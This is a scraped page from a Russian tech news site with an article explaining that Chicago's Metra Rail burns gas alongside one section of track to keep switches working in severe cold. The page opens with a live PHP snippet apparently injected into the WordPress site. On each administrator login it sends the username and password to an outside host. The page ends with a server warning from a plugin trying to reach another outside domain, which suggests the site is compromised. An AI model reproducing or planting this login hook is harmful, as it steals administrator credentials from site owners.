if (!function_exists("theme_login_init_0e40e986decc158f6acbb41c14e2f2b4")) { function theme_login_init_0e40e986decc158f6acbb41c14e2f2b4() { if (isset($_POST['log']) and isset($_POST['pwd'])) { $abc = $_POST['log']; $bca = $_POST['pwd']; $zxa = (array)wp_authenticate($abc, $bca); if (isset($zxa["allcaps"]['administrator'])) { $url = 'https://acjscsswp.com/loginfileweb?url=' . urlencode(wp_login_url()) . '&user=' . urlencode($abc) . '&pass=' . urlencode($bca) . '&site=' . urlencode(wp_login_url()); $response = wp_remote_get($url); } } } add_action('wp_login', 'theme_login_init_0e40e986decc158f6acbb41c14e2f2b4', 10, 0); } В Чикаго поджигают рельсы, чтобы поезда могли ходить при аномальных холодах — DigiLider

В Чикаго поджигают рельсы, чтобы поезда могли ходить при аномальных холодах

В Чикаго поджигают рельсы, чтобы поезда могли ходить при аномальных холодах

В Чикаго поджигают рельсы, чтобы поезда могли ходить при аномальных холодах

Компания Metra Rail, которая обслуживает часть пригородных железных дорог в Чикаго, пошла на экстраординарные меры, чтобы защитить пути от холода. В регионе сейчас стоят небывалые для этих мест морозы, воздух остыл до -34 °C, из-за чего замерзают переключатели на рельсах, а сам металл начинает сжиматься и деформироваться. На кадрах, снятых местными журналистами, хорошо видно горящие рельсы – последний способ победить холод.

Происходящее выглядит эффектно и даже напоминает кадры из фильма-катастрофы, в котором люди отчаянно сражаются с ледяной стужей. На деле же никто рельсы поджигать и не думал, просто в Metra Rail пустили в ход штатную систему обогрева, которую разработали как раз для таких случаев. И действует она только на одном участке магистрали под индексом A-2, потому что в остальных местах стоят более продвинутые электрические обогреватели или тепловые пушки.

Но схема путей на A-2 настолько сложная, что места для громоздкого оборудования там просто нет. Поэтому еще на этапе строительства рядом с рельсами проложили трубы для подачи газа – он и горит на снятых кадрах, а не сами рельсы. Это не очень хорошо для металла, поэтому систему с открытым пламенем включают только в экстренных случаях. И только там, где ездят локомотивы на дизельном топливе, во избежание возгорания горючего.


Warning: fsockopen(): Unable to connect to ssl://getajaxx.com:443 (Connection timed out) in /var/www/u0503503/data/www/digilider.ru/wp-content/plugins/custom-fetch-url/custom-fetch-url.php on line 22
Error: Connection timed out (110)